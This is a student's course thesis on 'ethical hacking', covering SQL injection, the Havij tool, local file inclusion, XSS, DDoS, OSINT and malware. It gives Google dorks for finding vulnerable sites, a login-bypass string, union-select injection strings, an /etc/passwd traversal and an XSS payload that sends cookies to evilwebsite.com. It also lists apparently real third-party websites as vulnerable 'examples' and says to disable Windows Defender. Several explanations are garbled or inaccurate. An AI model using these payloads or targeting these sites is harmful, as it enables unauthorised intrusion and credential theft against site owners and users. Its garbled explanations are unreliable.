ETHICAL HACKING

By Sakib Abdullah
On dated 7th March, 2023
Arena Batch No: 42 (Delta)

Declaration By Student:

I, Sakib Abdullh student of ARENA WEB SECURITIES batch 42 (Delta)I, Sakib

Abdullah, a student of ARENA WEB SECURITIES batch 42 (Delta). Hereby declare
that the work enlightened here which was done by me under the supervision of Mr.
Tanjim Al Fahim. It is not being published or submitted elsewhere for the requirement
of a degree program. Any literature date or work done by other and cited within this
thesis has given due acknowledgement and listed in the reference
 Sakib Abdullah

Place: Arena Web Security

Date: 7th March 2023

Certificate:
Certified that the thesis entitled “Ethical Hacking” submitted by Sakib Abdullah towards
partial fulfillment for the Course of ethical hacking done by the institution of Arena web
security is based on the investigation and learning done till now from the beginning of the
course carried out under our guidance. The thesis part therefore has not submitted for the
academic award of any other university or institution.

Countersigned Signature

....................................... .....................................

(Tanjim Al Fahim) (Sakib Abdullah)

Supervisor Batch: 42 (Delta)

Abstract:
Ethical hacking, also known as "white hat hacking," is a practice of attempting to hack into a
computer system or network in order to find and fix security vulnerabilities before malicious
hackers can exploit them.

Ethical hackers are security professionals who use the same techniques and tools as
malicious hackers, but with the permission of the system owners and with the goal of
identifying and fixing weaknesses. This process can involve a variety of techniques, including
penetration testing, vulnerability scanning, and social engineering, among others.

The ultimate goal of ethical hacking is to improve the security of computer systems and
networks by identifying and patching vulnerabilities before they can be exploited by
malicious hackers. Ethical hacking is an important part of any comprehensive security
strategy, and it helps organizations to protect their valuable assets and sensitive data from
cyber attacks.
Acknowledgement:
I would like to express my sincere gratitude to our honorable course instructor
and supervisor Tanjim AlFahim Sir, Ashif Sir, Jewel sir and all the authorities of
AWS for their continuous advice effort andvaluable guidance throughout the
research.I am really grateful to them.I would also like to thank to all my course
mate of this course who advised, helped and suggest me in need of the entire
courses whenever I stuck in some point.

Thank you.
Table of contents:

1. BASIC SQL INJECTION 5 – 7

2. HAVIJ 8 – 9
3. NOREDIRECT 10
4. MANUAL SQL INJECTION 11 – 12
5. LOCAL FILE INCLUSION (LFI) 12 – 14
6. CROSS-SITE SCRIPTING (XSS) 15 – 17
7. DDOS 17
8. GRABIFY 18
9. OSINT 18 – 19
10. MALWARE 20 – 21
11. SOCIAL MEDIA ACCOUNT RECOVER 22
12. HTTP & HTTPS 23
13. BLACLLIST REMOVAL 24
14. CONCLUTION 24
Basic SQL Injection:

SQL Injection is a vulnerability that allows data to be manipulated via

a website's code
injection method. SQL injection usually occurs when you ask a user
for input, like their
username/userid, and instead of a name/id, the user gives you an
SQL statement that you
will unknowingly run on your database.
First, we have to know what the vulnerability of a website is.A web
vulnerability is a
flaw in a website or web application.Application code that allows an
attacker to gain
some level of control of the site, and possiblythe hosting server. If
the vulnerability of a
website is quite large, if it has a low or high level of if there is a
possibility, it is possible
for the bad guys or attackers to attack it.
So to find such a vulnerable website, we need the help of Google
Dork. So
What is Google Dork?
Google hacking is a computer hacking technique that uses Google
Search and
other Google applications to find security holes in the configuration
and computer
code that websites use.We can find all of the websites that have
vulnerabilities for this at
Google Dork.
First, we need to search on Google using Google Dork. Here are some
examples of lists.
google dork:
Google Dorks compilation to find SQL injections:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid= inurl:games.php?id=
inurl:page.php?file=

inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:view_product.php?id=
There are different ways to attack and get access to a website. In this
part, we have
learned:
about basic SQL.
User: 1 'or' 1 '=' 1
Pass: 1 'or' 1 '=' 1
By using this user name and password, we can access many websites.
admin panel. The
working method of this injection is
On the internet, each and every website has a datebase. We become
allergic when we
enter the incorrect username and False Quary. But if we put the
above query in the
username and password field, then the database willaccept it as true
and grant the attacker
unauthorised access.
Example:
http://www.covid19maluku.com/

https://technopk.com/
HAVIJ:
Habij is an SQL injection tool that aids in the discovery and exploitation of
SQL vulnerabilities on websites. The working method of Havij is

First of all, we have to install Havij on our PC, and we must recognize that our
PC's Windows Defender must be disabled; otherwise, Windows will not allow
Havij to be installed on the computer.

After opening the Havij tool, we have to put the target URL on the target and click
analyze, and Havij will begin analyzing. We receive information after a few minutes.
After we've obtained coolum, we'll click on the table and then click get table. Then
we'll have a lot of files from which to choose our desired file, and after that, we'll
have to click get column; after that, we'll have a few files from which to choose our
desired file, then click get data, and we'll get our final data.

We can get data from Havij by following the steps outlined above.

To work on Havij, we must keep in mind that the S must be

removed. from "https" and put only "http" in the search box.

We should keep in mind that Havij only works on dynamic websites that have a php
id that begins witha value of 1, 2, 3, etc., or any numeric data. For instance, php
id=29

Some Google Dorks:

1: intitle:"index" of "admin" site:.in or others domain name

2: intitle:"index" of "admin" "framework" site:.in or others domain

name 3: intitle:"index" of "admin" "pdf" site:.in or others domain

name

4: intitle:"index" of "admin" "gallery" site:.in or others domain

name 5: intitle:"index" of "admin" "image" site:.in or others

domain name 6: intitle:"index" of "admin" "upload" site:.in or

others domain name 7: intitle:"index" of "admin" "banner"

site:.in or others domain name 8: intitle:"index" of "admin" "file"

site:.in or others domain name

9: intitle:"index" of "admin" "page" site:.in or others domain name

10: intitle:"index" of "admin" "news" site:.in or others domain name

http://www.megaplanet.co.th/project-details.php?id=26

http://www.pha.org.pk/sro_list.php?catid=1
NO REDIRECT:
Noredirect is another method of SQL injection. For use of this method, we have to
use a browser named "Cyber Fox." We used to go to the Tools menu after installing
Cyberfox and select Noredirect. Then click "add" and enter the URL link to which
we want to redirect.

Due to the redirect addons, we have blocked the admin page.

After that, we will search with the same link below, removing the letters after
admin. If still,won't take us to the dashboard, then we have to look for the other
address for the admin panel.For this, we will go to the next step below.

Example:
https://www.hotfm.com.pk/admin/login.php
Manual SQL Injection:
To perform manual SQL injection, we must have a dynamic website, such as
http://www.megaplanet.co.th/project-details.php?id=26. For use of a single string ('),
we have to find the vulnerable website.

Every website has a database. Where they kept all information. In every database, the
main information is stored in the columns and rows. So first off all, we will find out
how many columns there are on this website by using:

6 Order by 1-- (INT)

6' Order by 1---+

(STRING [6 is the number of id; like php?id=6 and 1 is the number of

columns] 6 Union select 1,2,3,4,5,6-- (INT)

6' Union select 1,2,3,4,5,6--+

(STRING) [Are sorted 1-6 in sequence. might have to use (-/.) This. Like this
Id=-6 or id=.6]

After this step, Which column is most vulnerable to attack in that column for get
the database.

These steps are following for attacking.

Union based ->DIOS My SQL ->DIOS by WAF (if it not worked then try another
one) (Copy DIOS link and execute in New tab)

Then get data from those columns.

6Union select 1,2,3,4,5, group_concat(column name) from (__data name__)-- (INT)

6'Union select 1,2,3,4,5, group_concat(column name) from (__data

name__)-- +(STRING)

Local File Inclusion(LFI):

A file inclusion vulnerability is a type of web vulnerability that is most commonly
found to affect web applications that rely on scripting at run time. This issue is caused
when an application builds a path to executable code using an attacker-controlled
variable in a way that allows the attacker to control which file is executed at run time.
A file include vulnerability is distinct from a generic directory traversal attack, in that
directory traversal is a way of gaining unauthorized file system access, and a file
inclusion vulnerability subverts how an application loads code for execution.
Successful exploitation of a file inclusion vulnerability will result in remote code
execution on the web server that runs the affected web application. An attacker can
use remote code execution to create a web shell on the web server, which can be used
for website defacement.

LFI stands for "local file inclusion." A local file inclusion bug is discovered. when a
developer includes user input in a PHP file. Local file inclusion (LFI) is similar to
a remote file inclusion vulnerability, except instead of including remote files, only
local files, i.e., files on the current server, can be included for execution. This issue
can still lead to remote code execution by including a file that contains
attacker-controlled data, such as the web server's access logs.

An attacker can use Local File Inclusion (LFI) to trick the web
application. into exposing or running files on the web server. An LFI
attack may lead to information disclosure, remote code execution, or
even cross-site Scripting (XSS). Typically, LFI occurs when an
application uses the path to a file as input. If the application treats this
input as trusted, a local file may be used in the include statement.

LFI is not a very common vulnerability. Not every website has a local file inclusion
vulnerability. It is present in 1% of web applications on average. LFI can be
dangerous when combined with other vulnerabilities; for example,if the attacker is
able to upload malicious files to the server.Even if the attacker cannot upload files,
they can use the LFI.vulnerability together with a directory traversal vulnerability
to access sensitive information.

How LFI works:

When a user enters a file into an application without having it properly validated, this is
known as a local file inclusion. By tampering with the input, an attacker can use this
weakness to insert harmful files.

By replacing end data of a URL with (../../../../../../../../../etc/passwd) then the server

read the url and get the necessary data or harmful files.

For example
http://www.scsi4me.com/display.php?page=Contact.php&nav_title=Contact Us

http://www.bharathcateringcollege.com/index.php?page=contact.php
Cross Site Scripting (XSS):

Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web
applications. XSS attacks enable attackers to inject client-side scripts into web pages
viewed by other users. A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy. Cross-site scripting carried out on
websites accounted for roughly 84% of all security vulnerabilities documented by
Symantec up until 2007. [1] XSS effects vary in range from petty nuisances to significant
security risks, depending on the sensitivity of the data handled by the vulnerable site and
the nature of any security mitigation implemented by the site's owner network.

If a web page or web application employs unsensitized user input in the output it generates, it
is susceptible to XSS. The victim's browser must analyze this user input. ActiveX, Flash,
VBScript, and even CSS all support XSS attacks. Nonetheless, they are most frequently seen
in JavaScript, mainly since JavaScript is used for the majority of browser activities.

If any site has XSS functionality, the problem is that it is not only Java or malicious
code, but in many cases, it can be malware, phishing, or inject.

JavaScript is a cross-platform, object-oriented scripting language. A big advantage

of JavaScript is that it can do a lot of work or produce a lot of output with the help
of very small programs or codes. In other words, JavaScript is a client-side
scripting language (that is, the browser of the web browser will run or execute these
scripts) or browser scripting language (a simple and short form of programming
language).

A hacker can do whatever he wants, including phishing, keylogging, and cookie

theft. How XSS works

Here’s an example:
<script>
i=new/**/Image();isrc=http://evilwebsite.com/log.php?'+document.cookie+'
'+document.location</script>
While the payload is usually JavaScript, XSS can take place using any
client-side language.
To carry out a cross site scripting attack, an attacker injects a malicious script into
user-provided input. Attackers can also carry out an attack by modifying a
request. If the web app is vulnerable to XSS attacks, the user-supplied input
executes as code. For example, in the request below, the script displays a message
box with the text “xss.”
http://www.site.com/page.php?var=<script>alert('xss');</script>
There are many ways to trigger an XSS attack. For example, the execution could
be triggered automatically when the page loads or when a user hovers over
specific elements of the page (e.g., hyperlinks).
Potential consequences of cross site scripting attacks include these:

∙ Capturing the keystrokes of a user.

∙ Redirecting a user to a malicious website.
∙ Runningweb browser-based exploits (e.g., crashing the browser). ∙
Obtaining the cookie information of a user who is logged into a website (thus
compromising the victim’s account).

In some cases, the XSS attack leads to a complete compromise of the victim’s
account. Attackers can trick users into entering credentials on a fake form,
which provides all the information to the attacker.
https://www.brothersfurniture.com.bd/search/reading-table/?q=table
https://www.q-files.com/search

DDOS:
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the
bandwidth or resources of a targeted system, usually one or more web servers. A DDoS
attack uses more than one unique IP address or machine, often from thousands of hosts
infected with malware.

A website has some limited access, like a few users using it at the same time. If
many users use the same website at the same time, then the website has traffic and
the server does not respond.

If a hacker wants to take down a website, then he/she does DDoS by using brute
force. By doing Brut, a hacker forced many unusual users to login or use a website
at the same time because the site was down. Because only a few users visited a
website, the server did not respond well. DDoS works like that.
GRABIFY:
A URL shortening company called Grabify shortens lengthy URLs and offers extra
detailed information, such IP logging. To stop people from catfishing others, a link
shortener called Grabify was first developed. Nevertheless, since the website's
introduction in 2014, users have discovered a variety of other applications for it, including
website analytics and an IP logging daemon that records users' IPs each time they switch
on their PCs so they have a record of everything

OSINT:
OSINT is the short form of Open Source Intelligence. Open Source Intelligence (OSINT)
is a method of gathering information from public or other open sources that can be
used by security experts, national intelligence agencies, or cybercriminals. When
used by cyber defenders, the goal is to discover publicly available information related
to their organization that could be used by attackers and take steps to prevent those
future attacks.

Here are three methods commonly used to gain open intelligence

data. Passive Collection:

This is the most commonly used way to gather OSINT intelligence. It involves scraping
publicly available websites, retrieving data from open APIs such as the Twitter API, or
pulling data from deep web information sources. The data is then parsed and organized for
consumption.

Semi-Passive:

This type of collection requires more expertise. It directs traffic to a target server to
obtain information about the server. Scanner traffic must be similar to normal
Internet traffic to avoid detection.

Active Collection:

This type of information collection interacts directly with a system to gather information
about it. Active collection systems use advanced technologies to access open ports and scan
servers or web applications for vulnerabilities.

This type of data collection can be detected by the target and reveals the reconnaissance
process. It leaves a trail in the target’s firewall, Intrusion Detection System (IDS), or
Intrusion Prevention System (IPS). Social engineering attacks on targets are also considered
a form of active intelligence gathering.
MALWARE:

Malware, or malicious software, is any program or file that is intentionally harmful

to a computer, network, or server.

Computer viruses, worms, Trojan horses, ransomware, and spyware are

examples of malware. These harmful applications steal, encrypt, and erase
private information. They also change or hijack fundamental computer
operations and track end users' online behavior.

Malware is able to infiltrate networks and devices and is designed with the
intention of negatively affecting such devices, networks, and/or their users. This
damage may manifest itself to the user or endpoint in many ways depending on the
type of malware and its objective. Malware can have very benign and minor effects
in some situations, but it can also have devastating effects in others. No matter the
technique, all malware is created to take advantage of devices at the expense of the
user and in favor of the hacker—the person who created and/or used the software.

Types of malwares:

• Computer viruses

• Trojan horses

• Rootkits

• Ransomware

• Keyloggers

• Grayware

• Fileless malware

• Adware

• Malvertising
• Spyware

• Backdoors

• Browser hijackers
• Malicious mobile apps

• Hybrid malware

How to Prevent Malware To prevent malware, it's vital to use a protection in

depth strategy that focuses on technical and non-technical solutions. Phishing
emails are one of the most common dirt paths, so it's vital to educate employees
about phishing and to avoid downloading doubtful addons or engaging with
emails. Also look out for doubtful domains or typosquatting that masquerades
as legitimate websites. Don't download third-party apps on Android devices
and avoid clicking pop-up ads. How to Detect Malware

There are a several general symptoms that may specify the presence of malware
on your device 1- Your device running slower than regular 2- You notice a
shortage of available storage space 3- Pop-ups and annoying programs seem on
your device 4- Your sensitive data has been exposed

How to remove malware Anti-malware (antivirus) programs block and remove

some or all types of malwares. Example, Microsoft Security Essentials
(Windows XP, Vista, and Windows 7) and Windows Defender (Windows 8, 10
and 11) delivers real-time protection. The windows malicious software
removal tool removes malicious software from the device
SOCIAL MEDEA ACCOUNT RECOVER:
Nowadays, social media is a famous activity around the world. Almost 90% of the
world's population uses Facebook, Instagram, Twitter, and Whatsapp, but Facebook is
the most popular app.

In our city, most users forget their Facebook passwords after a few months, and
sometimes hackers want to access their accounts because of their short passwords
and low varification.

The simple recovery method for Facebook passwords is

1. Go to the Facebook login page and click forget password."

2. After you do that, put your email or phone number in the search bar.
3. Facebook sent a verification code to your phone or email.
4. Open a new page after entering the verification code into Facebook.
5. Then Facebook will ask you to put in a new password.

This is the formal process to recover an account.

There are many other process to recover

hack account or disable account
HTTP & HTTPS:
The full form of HTTP is Hypertext Transfer Protocol. HTTP offers a set of rules and
standards that govern how any information can be transmitted on the World Wide Web.
HTTP provides standard rules for web browsers and servers to communicate. HTTP is an
application-layer network protocol that is built on top of TCP. HTTP uses
hypertext-structured text, which establishes the logical link between nodes containing text.
It is also known as "stateless protocol," as each command is executed separately without
using reference to the previous run command.

HTTPS stands for Hyper Text Transfer Protocol Secure. It is a highly advanced and secure
version of HTTP. It uses port 443 for data communication. It allows for secure transactions
by encrypting the entire communication with SSL. It is a combination of the SSL/TLS
protocol and HTTP. It provides encrypted and secure identification of a network server.

HTTP also allows you to create a secure, encrypted connection between the server and
the browser. It offers bi-directional security for data. This helps you protect potentially
sensitive information from being stolen.

In the HTTPS protocol, SSL transactions are negotiated with the help of a key-based
encryption algorithm. This key is generally either 40 or 128 bits in strength.

Advantages of HTTP

∙ HTTP can be implemented with other protocols on the Internet or on

other networks.
∙ HTTP pages are stored in computer and internet caches, so they are
quickly accessible.
∙ Platform-independent, which allows cross-platform porting

∙ Does not need any runtime support.

∙ Usable over firewalls! Global applications are possible.
∙ Not connection-oriented, so there is no network overhead to create and
maintain session state and information.

Advantages of HTTPS

∙ In most cases, sites running over HTTPS will have a redirect in place. Therefore,
even if you type in HTTP://, it will redirect to https over a secured connection. ∙ It
allows users to perform secure e-commerce transactions, such as online banking. ∙
SSL technology protects all users and builds trust.
∙ An independent authority verifies the identity of the certificate owner. So each
SSL certificate contains unique, authenticated information about the
certificate owner.
BLACKLIST REMOVAL:
If your IP address is blacklisted and you want to examine it, you have to visit the blacklist’s
website and do a lookup on your IP address. Most blacklist databases will provide general
listing reasons but won’t list exact email addresses tied to blacklisted IP addresses. If you
are able to find out why you were blacklisted, you can try to get it back. You want to work
with someone who is technically sound to better help you. To start with, take time to
confirm your network and mail server are confirmed properly and all the details are in order
for resolving the issue, as prescribed by the blacklist. For example, they may ask you to
provide accurate forward and reverse DNS records, as well as SMPT banners.

You can do the following:

• Scan all computers on your network for viruses.

• See if there are any known and needed patches (updates and fixes) for your operating

system. • Configure routers more strongly.

• Create and apply stronger passwords.

You want to be removed from any backlists because databases frequently share IP addresses
that have been recorded. If you think you have fixed things on your end, go back to the
backlist site and follow their instructions for the IP address removal process.

Conclution:
I would like to say that this course has enriched my knowledge on ethical hacking,
not to harm others but to know how an exploit or attack might happen so that we can
keep ourselves alert from any kind of attack from the attackers. The prime purpose of
ethical hacking is to prevent sensitive data from falling into enemy hands. It
safeguards your company from blackmail by those willing to exploit the
vulnerabilities. Through real world testing, you can enhance your digital network
security and prevent security breaches.